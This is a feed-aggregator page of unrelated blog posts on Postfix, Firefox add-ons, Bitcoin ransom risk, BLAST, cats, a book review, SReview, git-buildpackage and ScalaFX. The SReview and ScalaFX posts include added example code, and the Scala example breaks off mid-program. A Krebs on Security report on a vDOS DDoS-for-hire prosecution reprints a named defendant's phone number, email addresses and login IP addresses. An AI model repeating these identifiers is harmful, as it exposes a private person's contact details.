Then change the following in /etc/postfix/main.cf:

default_transport = error

to:

default_transport = local:root

and restart postfix:

systemctl restart postfix.service

Once that's done, you can find all of the emails in /var/mail/root.

So you can install mutt:

apt install mutt

and then view the mailbox like this:

mutt -f /var/mail/root

Don MartiTime-saving tip for Firefox 57

Last time I recommended the Tracking Protection feature in Firefox 57, coming tomorrow. The fast browser is even faster when you block creepy trackers, which are basically untested combinations of third-party JavaScript.

But what about sites that mistakenly detect Tracking Protection as "an ad blocker" and give you grief about it? Do you have to turn Tracking Protection off?

So far I have found that the answer is usually no. I can usually use NJS to turn off JavaScript for that site instead. (After all, if a web developer can't tell an ad blocker from a tracking protection tool, I don't trust their JavaScript anyway.)

NJS will also deal with a lot of "growth hacking" tricks such as newsletter signup forms that appear in front of the main article. And it defaults to on, so that sites with JavaScript will work normally until I decide that they're better off without it.

Entering the Quantum Era—How Firefox got fast again and where it’s going to get faster by Lin Clark

How to turn Tracking Protection on

Don MartiI'm taking a Bitcoin risk even though I don't hold Bitcoin. Please regulate me.

In the country where I live, kidnapping for ransom is not a very common crime.

That's because picking up the ransom is too risky.

It's easy to kidnap someone, and easy to let the person go when the ransom is paid, but picking up the ransom exposes you. Wannabe kidnappers who are motivated by money tend to choose other crimes.

As the [family relationship redacted] of a [family member information redacted], I'm happy that kidnapping is difficult here. High transaction costs for some kinds of transaction are a good thing.

Now, here comes Bitcoin.

As we're already seeing with ransomware, harder-to-trace ransom drops are now a thing.

So, even though I don't actually hold Bitcoin, someone could grab my family member (low risk), demand that I exchange some of my conventional assets for Bitcoin (low risk) and send the Bitcoin as ransom (low risk). The balance between risk and reward for the crime of kidnapping for ransom has changed.

IMHO this is a bigger problem than any of the reasons that Charles Stross wants Bitcoin to die in a fire.

So what to do about it?

Move the risks where the profits are.

Make the Bitcoin business eat the costs of payments made under duress.

New rule: If I ever trade any assets for Bitcoin in order to comply with a threat, and then transfer the Bitcoin under duress (kidnapping, ransomware, whatever), then I can go back to whoever I gave the assets to with a copy of the police report on the incident and get my original assets (and any fees) back.

Yes, that makes it harder for regular people to trade assets for Bitcoin. Exchanges would have to hold the money for a while, check that I'm not under duress, and probably do all kinds of other pain-in-the-ass, possibly costly, work. But I'd rather have that than the alternative.

Planet Linux AustraliaLev Lafayette: Rattus Norvegicus ESTs with BLAST and Slurm

The following is a short tutorial on using BLAST with Slurm using fasta nucleic acid (fna) FASTA formatted sequence files for Rattus Norvegicus. It assumes that BLAST (Basic Local Alignment Search Tool) is already installed.

First, create a database directory, download the datafile, extract it, and load the environment variables for BLAST.

mkdir -p ~/applicationtests/BLAST/dbs
cd ~/applicationtests/BLAST/dbs
wget ftp://ftp.ncbi.nih.gov/refseq/R_norvegicus/mRNA_Prot/rat.1.rna.fna.gz
gunzip rat.1.rna.fna.gz
module load BLAST/2.2.26-Linux_x86_64

Having extracted the file, there will be a fna formatted sequence file, rat.1.rna.fna. An example header line for a sequence:

>NM_175581.3 Rattus norvegicus cathepsin R (Ctsr), mRNA

Planet DebianLars Wirzenius: Unit and integration testing: an analogy with cars

A unit is a part of your program you can test in isolation. You write unit tests to test all aspects of it that you care about. If all your unit tests pass, you should know that your unit works well.

Integration tests are for testing that when your various well-tested, high quality units are combined, integrated, they work together. Integration tests test the integration, not the individual units.

You could think of building a car. Your units are the ball bearings, axles, wheels, brakes, etc. Your unit tests for the ball bearings might test, for example, that they can handle a billion rotations, at various temperatures, etc. Your integration test would assume the ball bearings work, and should instead test that the ball bearings are installed in the right way so that the car, as a whole, can run for kilometers, accelerate and brake every kilometer, use only so much fuel, produce only so much pollution, and not kill passengers in case of a crash.

Planet Debian - Sven Hoexter: Offering a Simtec Entropy Key

Since I started to lean a bit towards the concept of minimalism I've got rid of stuff, including all stationary computers. So for now I'm left with just my laptop, and that's something where I do not want to attach a USB entropy key permanently. That's why I have a spare Simtec Entropy Key I no longer use, and I'm willing to sell it.

In case someone is interested, I'm willing to give it away for 20EUR + shipping. If you can convince me it'll be of use for the Debian project (end up on a DSA managed machine for example) I'm willing to give it away for less. If you're located in Cologne, Copenhagen or Barcelona we might be able, depending on the timing, to do a personal handover (with or without keysigning). Otherwise I guess shipping is mainly interesting for someone also located in Europe.

You can use sven at stormbind dot net or hoexter at debian dot org to contact me and use GPG key 0xA6DC24D9DA2493D1.

Planet Debian - Ben Armstrong: The Joy of Cat Intelligence

As a cat owner, being surprised by cat intelligence delights me. They’re not exactly smart like a human, but they are smart in cattish ways. The more I watch them and try to sort out what they’re thinking, the more it pleases me to discover they can solve problems and adapt in recognizably intelligent ways, sometimes unique to each individual cat. Each time that happens, it evokes in me affectionate wonder.

Today, I had one of those joyful moments.

First, you need to understand that some months ago, I thought I had my male cat all figured out with respect to mealtimes. I had been cleaning up after my oafish boy who made a watery mess on the floor from his mother’s bowl each morning. I was slightly annoyed, but was mostly curious, and had a hunch. A quick search of the web confirmed it: my cat was left-handed. Not only that, but I learned this is typical for males, whereas females tend to be right-handed. Right away, I knew what I had to do: I adjusted the position of their water bowls relative to their food, swapping them from right to left; the messy morning feedings ceased. I congratulated myself for my cleverness.

You see, after the swap, as he hooked the kibbles with his left paw out of the right-hand bowl, they would land immediately on the floor where he could give them chase. The swap caused the messes to cease because before, his left-handed scoops would land the kibbles in the water to the right; he would then have to scoop the kibble out onto the floor, sprinkling water everywhere! Furthermore, the sodden kibble tended to not skitter so much, decreasing his fun. Or so I thought. Clearly, I reasoned, having sated himself on the entire contents of his own bowl, he turned to pilfering his mother’s leftovers for some exciting kittenish play. I had evidence to back it up, too: he and his mother both seem to enjoy this game, a regular fixture of their mealtime routines. She, too, is adept at hooking out the kibbles, though mysteriously, without making a mess in her water, whichever way the bowls are oriented. I chalked this up to his general clumsiness of movement vs. her daintiness and precision, something I had observed many times before.

Come to think of it, lately, I’ve been seeing more mess around his mother’s bowl again. Hmm. I don’t know why I didn’t stop to consider why …

And then my cat surprised me again.

This morning, with Shadow behind my back as I sat at my computer, finishing up his morning meal at his mother’s bowl, I thought I heard something odd. Or rather, I didn’t hear something. The familiar skitter-skitter sound of kibbles evading capture was missing. So I turned and looked. My dear, devious boy had squished his overgrown body behind his mother’s bowls, nudging them ever so slightly askew to fit the small space. Now the bowl orientation was swapped back again. Stunned, I watched him carefully flip out a kibble with his left paw. Plop! Into the water on the right. Concentrating, he fished for it. A miss! He casually licked the water from his paw. Another try. Swoop! Plop, onto the floor. No chase now, just satisfied munching of his somewhat mushy kibble. And then it dawned on me that I had got it somewhat wrong. Yes, he enjoyed Chase the Kibble, like his mom, but I never recognized he had been indulging in a favourite pastime, peculiarly his own …

I had judged his mealtime messes as accidents, a very human way of thinking about my problem. Little did I know, it was deliberate! His private game was Bobbing for Kibbles. I don’t know if it’s the altered texture, or dabbling in the bowl, but whatever the reason, due to my meddling, he had been deprived of this pleasure. No worries, a thwarted cat will find a way. And that is the joy of cat intelligence.

Planet Linux Australia - Linux Users of Victoria (LUV) Announce: LUV Main December 2017 Meeting

Dec 5 2017 18:30 to 20:30
Location: Mail Exchange Hotel, 688 Bourke St, Melbourne VIC 3000

PLEASE NOTE NEW LOCATION

Speakers to be announced.


Food and drinks will be available on premises.

Linux Users of Victoria is a subcommittee of Linux Australia.


Planet Linux Australia - Linux Users of Victoria (LUV) Announce: LUV November 2017 Workshop: Status at a glance with LCDproc

Nov 18 2017 12:30 to 16:30
Location: Infoxchange, 33 Elizabeth St. Richmond

Status at a glance with LCDproc

Andrew Pam will demonstrate how to use small LCD or LED displays to provide convenient status information using LCDproc.  Possibly also how to write custom modules to display additional information.

The meeting will be held at Infoxchange, 33 Elizabeth St. Richmond 3121 (enter via the garage on Jonas St.) Late arrivals, please call (0421) 775 358 for access to the venue.

LUV would like to acknowledge Infoxchange for the venue.

Linux Users of Victoria is a subcommittee of Linux Australia.


Planet Debian - Russ Allbery: Review: Night Moves

Review: Night Moves, by Pat Green

Publisher: Aquarius
Copyright: 2014
ISBN: 0-9909741-1-1
Format: Kindle
Pages: 159

In the fall of 2012, Pat Green was a preacher of a failing church, out of a job, divorced for six months, and feeling like a failure at every part of his life. He was living in a relative's house and desperately needed work; his father had been a taxi driver, so he got a job as a 6pm to 6am taxi driver in his home town of Joliet, Illinois. That job fundamentally changed his understanding of the people who live in the night, how their lives work, and what it means to try to help them.

This is nonfiction: a collection of short anecdotes about life as a cab driver and the people who have gotten a ride in Green's cab. They're mostly five or six pages long, just a short story or window into someone's life. I ran across Pat Green's writing by following a sidebar link from a post on Patheos (probably from Love, Joy, Feminism, although I no longer remember). Green has an ongoing blog on Patheos about raising his transgender son (who appears in this collection as a lesbian daughter; he wasn't out yet as transgender when this was published), which is both a good sample of his writing and occasionally has excerpts from this book.

Green's previous writing experience, as mentioned at several points in this collection, was newspaper columns in the local paper. It shows: these essays have the succinct, focused, and bite-sized property of a good newspaper article (or blog post). The writing is a little rough, particularly the remembered dialogue that occasionally falls into the awkward valley between dramatic, constructed fictional dialogue and realistic, in-the-moment speech. But the stories are honest and heartfelt and have the self-reflective genuineness of good preaching paired with a solid sense of narrative. Green tries to observe and report first, both the other person and his own reactions, and only then to draw more general conclusions.

This book is also very hard to read. It's not a sugar-coated view of people who live in the night of a city, nor is it constructed to produce happy endings. The people who Green primarily writes about are poor, or alone, or struggling. The story that got me to buy this book, about taking a teenage girl to a secret liaison that turned out to be secret because her liaison was another girl, is heartwarming but also one of the most optimistic stories here. A lot of people die or just disappear after being regular riders for some time. A lot of people are desperate and don't have any realistic way out. Some people, quite memorably, think they have a way out, and that way out closes on them.

The subtitle of this book is "An Ex-Preacher's Journey to Hell in a Taxi" and (if you followed the link above) you'll see that Green is writing in the Patheos nonreligious section. The other theme of this collection is the church and its effect on the lives of people who are trying to make a life on the outskirts of society. That effect is either complete obliviousness or an active attempt to make their lives even worse. Green lays out the optimism that he felt early in the job, the hope that he could help someone the way a pastor would, guide her to resources, and how it went horribly wrong when those resources turned out to not be interested in helping her at all. And those stories repeat, and repeat.

It's a book that makes it very clear that the actual practice of Christianity in the United States is not about helping poor or marginalized people, but there are certainly plenty of Christian resources for judging, hurting people, closing doors, and forcing abused people back into abusive situations, all in the name of God. I do hope some Christians read this and wince very hard. (And lest the progressive Christians get too smug, one of the stories says almost as brutal things about liberal ministries as the stories of conservative ones.)

I came away feeling even more convinced by the merits of charities that just give money directly to poor people. No paternalism, no assuming that rich people know what they need, no well-meaning intermediary organizations with endless rules, just resources delivered directly to the people who most need resources. Ideally done by the government and called universal basic income. Short of constructing a functional government that builds working public infrastructure, and as a supplement even if one has such a government (since infrastructure can't provide everything), it feels like the most moral choice. Individual people may still stay mired in awful situations, but at least that isn't compounded by other people taking their autonomy away and dictating life to them in complete ignorance.

This is a fairly short and inexpensive book. I found it very much worth reading, and may end up following Green's blog as well. There are moments of joy and moments of human connection, and the details of the day-to-day worries and work style of a taxi driver (in this case, one who drives a company car) are pretty interesting. (Green does skip over some parts for various reasons, such as a lot of the routine fares and most of the stories of violence, but does mention what he's skipping over.) But it's also a brutal book, because so many people are hurting and there isn't much Green can do about it except bear witness and respect them as people in a way that religion doesn't.

Recommended, but brace yourself.

Rating: 8 out of 10

Planet Linux Australia - Clinton Roy: Access and Memory: Open GLAM and Open Source

Over the years of my involvement with library projects, like Coder Dojo, programming workshops and such, I’ve struggled to nail down the intersection between libraries and open source. At this year's linux.conf.au in Sydney (my seventeenth!) I’m helping to put together a miniconf to answer this question: Open GLAM. If you do work in the intersection of galleries, libraries, archives, museums and open source, we’d love to hear from you.


Filed under: lca, oss, Uncategorized


Don Marti - my Firefox 57 add-ons

Firefox 57 is coming on Tuesday, and as you may have heard, add-ons must use the WebExtensions API. I have been running Firefox Nightly for a while, so add-on switching came for me early. Here is what I have come up with.

The basic set

Privacy Badger is not on here just because I'm using Firefox Tracking Protection. I like both.

Blogging, development and testing

  • blind-reviews. This is an experiment to help break your own habits of bias when reviewing code contributions. It hides the contributor name and email when you first see the code, and you can reveal it later. Right now it just does Bugzilla, but watch this space for an upcoming GitHub version. (more info)

  • Copy as Markdown. Not quite as full-featured as the old "Copy as HTML Link" but still a time-saver for blogging. Copy both the page title and URL, formatted as Markdown, for pasting into a blog.

  • Firefox Pioneer. Participate in Firefox user research. Studies have extremely strict and detailed privacy policies.

  • Test Pilot. Try new Firefox features. Tracking Protection was on Test Pilot for a while. Right now there is a new speech recognition one, an in-browser notepad, and more.

Advanced (for now) nerdery

  • Cookie AutoDelete. Similar to the old "Self-Destructing Cookies". Cleans up cookies after leaving a site. Useful but requires me to whitelist the sites where I want to stay logged in. More time-consuming than other privacy tools.

  • PrivacyPass. This is new. Privacy Pass interacts with supporting websites to introduce an anonymous user-authentication mechanism. In particular, Privacy Pass is suitable for cases where a user is required to complete some proof-of-work (e.g. solving an internet challenge) to authenticate to a service. Right now I don't use any sites that have it, but it could be a great way to distribute "tickets" for reading articles or leaving comments.

Note on ad blocking

If you run an ad blocker, the pre-57 add-ons check is a good time to make sure that you're not compromising your privacy by participating in a paid whitelisting scheme. As long as you have to go through your add-ons anyway, it's a great time to ditch AdBlock Plus or Adblock. They're taking advantage of users to shake down web sites.

What to use instead? For most people, either the built-in Firefox Tracking Protection or EFF's Privacy Badger will provide good protection. I would try one or both of those before a conventional ad blocker. If sites have a broken ad blocker detector that falsely identifies a tracking protection tool as an ad blocker, you can usually get around it by turning off JavaScript for that site with NJS.

If you still want to get rid of more ads and join the blocker vs. anti-blocker game (I don't), there's always uBlock Origin, which does not do paid whitelisting (the project site has more info). But try either the built-in tracking protection or Privacy Badger first.

New Firefox Quantum arrives November 14, 2017

Firefox Quantum 57 for developers

Rondam Ramblings - Battling racism in a free society

A week ago I wrote a tiny, almost throwaway, article entitled "Racism is Alive and Well in America."  It was more of a spur-of-the-moment reaction to John Kelly's egregious and historically ignorant attempt at Confederate apologetics, which culminated in (but did not start with) his now infamous quote that the American Civil War was a result of "the lack of an ability to compromise." That


Cryptogram - Friday Squid Blogging: Squid Season May Start Earlier Next Year

Squid fisherman in Argentina have asked regulators to start the squid season earlier in 2018.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Planet Debian - Paulo Santana: Hello world

I've been a Debian Maintainer since January 2017.

Rondam Ramblings - The Bitcoin apocalypse is coming in mid-November to a block chain near you

[UPDATE: This post originally said that the SegWit2X fork will happen on November 1.  In fact it is scheduled to occur on block 494,764.  It is impossible to predict exactly when this will happen, but at current hash rates it will probably be some time in mid-to-late November.  The post has been edited to reflect this.] [UPDATE2: Chaos has been averted.  The Segwit2x faction blinked.] Back

Krebs on Security - Hack of Attack-for-Hire Service vDOS Snares New Mexico Man

A New Mexico man is facing federal hacking charges for allegedly using the now defunct attack-for-hire service vDOS to launch damaging digital assaults aimed at knocking his former employer’s Web site offline. Prosecutors were able to bring the case in part because vDOS got massively hacked last year, and its customer database of payments and targets leaked to this author and to the FBI.

Prosecutors in Minnesota have charged John Kelsey Gammell, 46, with using vDOS and other online attack services to hurl a year’s worth of attack traffic at the Web sites associated with Washburn Computer Group, a Minnesota-based company where Gammell used to work.

vDOS as it existed on Sept. 8, 2016.

vDOS existed for nearly four years, and was known as one of the most powerful and effective pay-to-play tools for launching distributed denial-of-service (DDoS) attacks. The vDOS owners used a variety of methods to power their service, including at least one massive botnet consisting of tens of thousands of hacked Internet of Things (IoT) devices, such as compromised Internet routers and security cameras. vDOS also was used in numerous DDoS attacks against this site.

Investigators allege that although Gammell used various methods to hide his identity, email addresses traced back to him were found in the hacked user and target databases from vDOS.

More importantly, prosecutors say, someone began taunting Washburn via Yahoo and Gmail messages while the attacks were underway, asking how everything was going at the company and whether the IT department needed any help.

“Also attached to this second email was an image of a mouse laughing,” the Justice Department indictment (PDF) alleges. “Grand jury subpoenas for subscriber information were subsequently served on Google…and Yahoo. Analysis of the results showed information connecting both accounts to an individual named John Gammell. Both email addresses were created using the cell phone number 612-205-8609.”

The complaint notes that the government subpoenaed AT&T for subscriber information and traced that back to Gammell as well; that phone number is also currently listed as the recovery number for a Facebook account tied to John K. Gammell.

That Facebook account features numerous references to the hacker collective known as Anonymous. This is notable because according to the government Gammell used two different accounts at vDOS: One named “AnonCunnilingus” and another called “anonrooster.” The email addresses this user supplied when signing up at vDOS (jkgammell@gmail.com and jkgammell@icloud.com) include other addresses quite clearly tied to multiple accounts for John K. Gammell.

John K. Gammell’s Facebook account.

Below is a snippet from a customer service ticket that the AnonCunnilingus account filed in Aug. 2015.

“Dear Colleagues, this is Mr. Cunnilingus. You underestimate your capabilities. Contrary to your statement of “Notice!” It appears from our review that you are trying to stress test a DDoS protected host, vDOS stresser is not capable of taking DDoS protected hosts down which means you will not be able to drop this hosting using vDOS stresser…As they do not have my consent to use my internet, after their site being down for two days, they changed their IP and used rackspace DDoS mitigation and must now be removed from cyberspace. Verified by downbyeveryone. We will do much business. Thank you for your outstanding product 🙂 We Are Anonymous USA.”

Gammell has pleaded not guilty to the charges. He has not responded to requests for comment. The indictment states that Gammell allegedly attacked at least a half-dozen other companies over a year-long period between mid-2015 and July 2016, including several banks and two other companies at which he either previously worked or with whom he’d interviewed for a job.

In late July 2016, an anonymous security researcher reached out to KrebsOnSecurity to share a copy of the vDOS databases. The databases showed that vDOS made more than $600,000 in just two of the four years it was in operation, helping to launch more than 150,000 DDoS attacks.

Since then, two alleged co-owners of vDOS — two 19-year-old Israeli men —  have been arrested and charged with operating an attack-for-hire service. Aside from Gammell’s case, I am not aware of any other public cases involving the prosecution of people who allegedly used vDOS to conduct attacks.

But that will hopefully change soon, as there are countless clues about the identities of other high-volume vDOS users and their targets. Identifying the perpetrators in those cases should not be difficult because at some point vDOS stopped allowing users to log in to the service using a VPN, meaning many users likely logged into vDOS using an Internet address that can be traced back to them either via a home Internet or wireless account.

According to a review of the vDOS database, both accounts allegedly tied to Gammell were banned by vDOS administrators — either because he shared his vDOS username and password with another person, or because he logged on to the accounts with a VPN. Here’s a copy of a notice vDOS sent to AnonCunnilingus on July 28, 2015:

“Dear AnonCunnilingus , We have recently reviewed your account activity, and determined that you are in violation of vDos’s Terms of Service, It appears from our review that you have shared your account (or accessed vDos stresser from several locations and platforms) which is against our Terms of Services. Please refer to the following logs and terms:\n- AnonCunnilingus logged in using the following IPs: 64.145.76.110 (US), 85.10.210.199 (XX) date: 06-08-2015 18:05\n\n- 8) You are not allowed to access vDos stresser using a VPN/VPS/Proxy/RDP/Server Tunnelling and such.\n- 3) You may not share your account, if you will, your account will be closed without a warning or a refund!”

What’s most likely limiting prosecutors from pursuing more vDOS users is a lack of DDoS victims coming forward. In an advisory issued last month, the FBI urged DDoS victims to report the attacks.

The FBI requests DDoS victims contact their local FBI field office and/or file a complaint with the Internet Crime Complaint Center (IC3), regardless of dollar loss or timing of incident. Field office contacts can be identified at www.fbi.gov/contact-us/field. IC3 complaints should be filed at www.ic3.gov with the following details (if applicable):

  • Traffic protocol used by the DDoS (DNS, NTP, SYN flood, etc)
    • Attempt to preserve netflow and/or packet capture of the attack
  • Any extortion/threats pertaining to the DDoS attack
    • Save any such correspondence in its original, unforwarded format
  • Victim information
  • Overall losses associated with the DDoS attack
  • If a ransom associated with the attack was paid, provide transaction details, the subject’s email address, and/or crypto currency wallet address
  • Victim impact statement (e.g., impacted services/operations)
  • IP addresses used in the DDoS attack

Related reading:

How Not to DDoS Your Former Employer

Planet Debian - Wouter Verhelst: SReview 0.1

This morning I uploaded version 0.1 of SReview, my video review and transcoding system, to Debian experimental. There's still some work to be done before it'll be perfectly easy to use by anyone, but I do think I've reached the point where it should have basic usability.

Quick HOWTO for how to use it:

  • Enable Debian experimental
  • Install the packages sreview-master, sreview-encoder, sreview-detect, and sreview-web. It's possible to install the four packages on different machines, but let's not go into too much detail there, yet.
  • The installation will create an sreview user and database, and will start the sreview-web service on port 8080, listening only to localhost. The sreview-web package also ships with an apache configuration snippet that shows how to proxy it from the interwebs if you want to.
  • Run sreview-config --action=dump. This will show you the current configuration of sreview. If you want to change something, either change it in /etc/sreview/config.pm, or just run sreview-config --set=variable=value --action=update.
  • Run sreview-user -d --action=create -u <your email>. This will create an administrator user in the sreview database.
  • Open a webbrowser, browse to http://localhost:8080/, and test whether you can log on.
  • Write a script to insert the schedule of your event into the SReview database. Look at the debconf and fosdem scripts for inspiration if you need it. Yeah, that's something I still need to genericize, but I'm not quite sure yet how to do that.
  • Either configure gridengine so that it will have the required queues and resources for SReview, or disable the qsub commands in the SReview state_actions configuration parameter (e.g., by way of sreview-config --action=update --set=state_actions=... or by editing /etc/sreview/config.pm).
  • If you need notification, modify the state_actions entry for notification so that it sends out a notification (e.g., through an IRC bot or an email address, or something along those lines). Alternatively, enable the "anonreviews" option, so that the overview page has links to your talk.
  • Review the inputglob and parse_re configuration parameters of SReview. The first should contain a filesystem glob that will find your raw assets; the second should parse the filename into room, year, month, day, hour, minute, and second, components. Look at the defaults of those options for examples (or just use those, and store your files as /srv/sreview/incoming/<room>/<year>-<month>-<day>/<hour>:<minute>:<second>.*).
  • Provide an SVG file for opening credits, and point to it from the preroll_template configuration option.
  • Provide an SVG or PNG file for closing credits, and point to it from the postroll_template or postroll configuration option, respectively.
  • Start recording, and watch SReview do its magic :-)
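As an added illustration (not SReview code; SReview's own inputglob and parse_re are set in the Perl file /etc/sreview/config.pm), the Python below shows what a parse_re for the default-style layout above has to capture, pairs it with the inputglob it belongs to, and skips names that fit the pattern but encode an impossible timestamp, which a bare regex would happily accept. The paths and room names are constructed.

```python
import re
from datetime import datetime
from fnmatch import fnmatch
from typing import Dict, List, Optional

# Layout from the HOWTO: /srv/sreview/incoming/<room>/<year>-<month>-<day>/<hour>:<minute>:<second>.*
# Regex and glob here illustrate the two options; they are not SReview's shipped defaults.
INCOMING_GLOB = "/srv/sreview/incoming/*/*/*.*"       # what inputglob would enumerate
INCOMING_RE = re.compile(                              # what parse_re must capture
    r"""^/srv/sreview/incoming/
        (?P<room>[^/]+)/
        (?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})/
        (?P<hour>\d{2}):(?P<minute>\d{2}):(?P<second>\d{2})
        \.[^/]+$""",
    re.VERBOSE,
)


def parse_incoming(path: str) -> Optional[Dict[str, object]]:
    """Return room, start time and path for a raw asset, or None if it does not fit."""
    # fnmatch's '*' also matches '/', unlike a shell glob, so the regex is the real gate.
    if not fnmatch(path, INCOMING_GLOB):
        return None
    m = INCOMING_RE.match(path)
    if not m:
        return None
    try:
        start = datetime(int(m["year"]), int(m["month"]), int(m["day"]),
                         int(m["hour"]), int(m["minute"]), int(m["second"]))
    except ValueError:
        # e.g. hour 25 or month 13: matches the pattern but is not a real timestamp
        return None
    return {"room": m["room"], "start": start, "path": path}


def group_by_room(paths: List[str]) -> Dict[str, List[Dict[str, object]]]:
    """Group parsable assets per room, sorted by start time (the order a schedule needs)."""
    grouped: Dict[str, List[Dict[str, object]]] = {}
    for p in paths:
        parsed = parse_incoming(p)
        if parsed is None:
            continue
        grouped.setdefault(str(parsed["room"]), []).append(parsed)
    for room in grouped:
        grouped[room].sort(key=lambda d: d["start"])
    return grouped


# Constructed sample paths (not from a real event)
SAMPLE_PATHS = [
    "/srv/sreview/incoming/janson/2017-11-10/09:00:00.mp4",
    "/srv/sreview/incoming/janson/2017-11-10/08:30:00.mp4",
    "/srv/sreview/incoming/k1105/2017-11-10/09:15:30.ts",
    "/srv/sreview/incoming/k1105/2017-11-10/25:15:30.ts",   # impossible hour, skipped
    "/srv/sreview/incoming/notes.txt",                       # wrong layout, skipped
]

if __name__ == "__main__":
    for room, assets in group_by_room(SAMPLE_PATHS).items():
        for a in assets:
            print(room, a["start"].isoformat(), a["path"])
```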

There's still some bits of the above list that I want to make easier to do, and there's still some things that shouldn't be strictly necessary, but all in all, I think SReview has now reached a certain level of maturity that means I felt confident doing its first upload to Debian.

Did you try it out? Let me know what you think!

Cryptogram - New Research in Invisible Inks

It's a lot more chemistry than I understand:

Invisible inks based on "smart" fluorescent materials have been shining brightly (if only you could see them) in the data-encryption/decryption arena lately.... But some of the materials are costly or difficult to prepare, and many of these inks remain somewhat visible when illuminated with ambient or ultraviolet light. Liang Li and coworkers at Shanghai Jiao Tong University may have come up with a way to get around those problems. The team prepared a colorless solution of an inexpensive lead-based metal-organic framework (MOF) compound and used it in an ink-jet printer to create completely invisible patterns on paper. Then they exposed the paper to a methylammonium bromide decryption solution...revealing the pattern.... They rendered the pattern invisible again by briefly treating the paper with a polar solvent....

Full paper.

Worse Than Failure - Error'd: It Doesn't Mean What You Think it Means

"TRWTF here is I can't believe they shorted me on my change!" writes Diane B.

"I'm trying to order a shirt but I can't decide on which size to pick," writes Mark L., "I mean, is 03-XL bigger than 02-XL?"

Alex wrote, "So, Slack, exactly what would you say isn't working here?"

"I have a lot of questions about this agreement, but not nearly as many as it seems to have about itself," writes Dan B.

Josh writes, "Go figure. Here I thought 19 characters was between 6 and 30."

"Never mind the national meteorological services, Outlook has the most precise weather around!" wrote Kris L.

Planet Debian - Guido Günther: git-buildpackage 0.9.2

After some time in the experimental distribution I uploaded git-buildpackage 0.9.0 to sid a couple of weeks ago, and we're now at 0.9.2 as of today. This brought in two new commands:

  • gbp export-orig to regenerate tarballs based on the current version in debian/changelog. This was always possible by using gbp buildpackage and ignoring the build result, e.g. gbp buildpackage --git-builder=/bin/true …, but having a separate command is much more straightforward.

  • gbp push to push everything related to the current version in debian/changelog: debian-tag, debian-branch, upstream-branch, upstream-tag, pristine-tar branch. This could already be achieved by a posttag hook, but having it separate is again more straightforward and reduces the number of knobs one has to tweak.

We moved to better supported tools:

  • Switch to Python3 from Python2
  • Switch from epydoc to pydoctor
  • Finally switch from Docbook SGML to Docbook XML (we ultimately want to switch to Sphinx at one point but this will be much simpler now).

We added integration with pk4:

 mkdir -p ~/.config/pk4/hooks-enabled/unpack/
 ln -s /usr/share/pk4/hooks-available/unpack/gbp ~/.config/pk4/hooks-enabled/unpack/

so pk4 invokes gbp import-dsc on package import.

There were lots of improvements all over the place like gbp pq now importing the patch queue on switch (if it's not already there) and gbp import-dsc and import-orig not creating pointless master branches if debian-branch != 'master'. And after being broken in the early 0.9.x cycle gbp buildpackage --git-overlay ... should be much better supported now that we have proper tests.

All in all 26 bugs fixed. Thanks to everybody who contributed bug reports and fixes.

Don Marti - Welcome Planet Mozilla readers

Welcome Planet Mozilla readers. (I finally figured out how to do a tagged feed for this blog, to go along with the full feed. So now you can get the items from the tagged feed on Planet Mozilla.)

The main feed has some items that aren't in the Mozilla feed.

Anyway, if you're coming to Austin, please mark your calendar now.

Two more links: I'm on Keybase and Mozillians. And @dmarti on Twitter.

Planet Debian - Norbert Preining: ScalaFX: dynamic update of context menu of table rows

Context menus are useful to exhibit additional functionality. For my TLCockpit program I am listing the packages, updates, and available backups in a TreeTableView. The context for each row should be different depending on the status of the content displayed.

My first try, taken from searches on the web, was to add the context menu via the rowFactory of the TreeTableView:

table.rowFactory = { p =>
  val row = new TreeTableRow[SomeObject] {}
  val infoMI = new MenuItem("Info") { onAction = /* use row.item.value */ }
  val installMI = new MenuItem("Install") { onAction = /* use row.item.value */ }
  val removeMI = new MenuItem("Remove") { onAction = /* use row.item.value */ }
  val ctm = new ContextMenu(infoMI, installMI, removeMI)
  row.contextMenu = ctm
  row
}

This worked nicely until I tried to disable/enable some items based on the status of the displayed package:

  ...
  val pkg: SomeObject = row.item.value
  val isInstalled: Boolean = /* determine installation status of pkg */
  val installMI = new MenuItem("Install") { 
    disable = isInstalled
    onAction = /* use row.item.value */
  }

What I did here is just pull the shown package, get its installation status, and disable the Install context menu entry if it is already installed.

All good and fine I thought, but somehow reality was different. First there were NullPointerExceptions (a rare occurrence in Scala for me), and then somehow it didn’t work out at all.

The explanation is simple, and can be found by printing something in the rowFactory function. Only as many rows are made as fit into the current screen size (plus a bit), and their content is dynamically updated when one scrolls. But the enable/disable status of the context menu entries was not updated along with the content.

To fix this one needs to add a callback on the displayed item, which is exposed in row.item. So the correct code is (assuming that a SomeObject has a BooleanProperty installed):

table.rowFactory = { p =>
  val row = new TreeTableRow[SomeObject] {}
  val infoMI = new MenuItem("Info") { onAction = /* use row.item.value */ }
  val installMI = new MenuItem("Install") { onAction = /* use row.item.value */ } 
  val removeMI = new MenuItem("Remove") { onAction = /* use row.item.value */ }
  val ctm = new ContextMenu(infoMI, installMI, removeMI)
  row.item.onChange { (_,_,newContent) =>
    // newContent is null when the recycled row becomes empty
    if (newContent != null) {
      val isInstalled: Boolean = newContent.installed.value
      installMI.disable = isInstalled
      removeMI.disable = !isInstalled
    }
  }
  row.contextMenu = ctm
  row
}

The final output then gives me:

That’s it, the context menus are now correctly adapted to the displayed content. If there is a simpler way, please let me know.
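The row-recycling fix above as a complete, stand-alone ScalaFX 8 program, added here as an example that is not code from the original post or from TLCockpit. It assumes a hypothetical Pkg class whose installed flag is a BooleanProperty (the post's SomeObject assumption), and "installing" only flips that flag so the menu state can be rechecked without scrolling.

```scala
// Added example (not from the original post): why context-menu state must follow
// row.item rather than the row itself. Pkg is a hypothetical stand-in for SomeObject.
import scalafx.Includes._
import scalafx.application.JFXApp
import scalafx.beans.property.{BooleanProperty, StringProperty}
import scalafx.scene.Scene
import scalafx.scene.control._

// Hypothetical package model: the installed flag is a BooleanProperty, as assumed in the post.
class Pkg(name0: String, installed0: Boolean) {
  val name = StringProperty(name0)
  val installed = BooleanProperty(installed0)
}

object ContextMenuDemo extends JFXApp {
  // Constructed sample data: 200 rows, far more than fit on screen, so rows are recycled
  // while scrolling and the same TreeTableRow instance displays many different packages.
  val pkgs = (1 to 200).map(i => new Pkg(s"pkg-$i", installed0 = i % 3 == 0))

  val rootItem = new TreeItem[Pkg](new Pkg("all packages", installed0 = true)) {
    expanded = true
    children = pkgs.map(p => new TreeItem[Pkg](p))
  }

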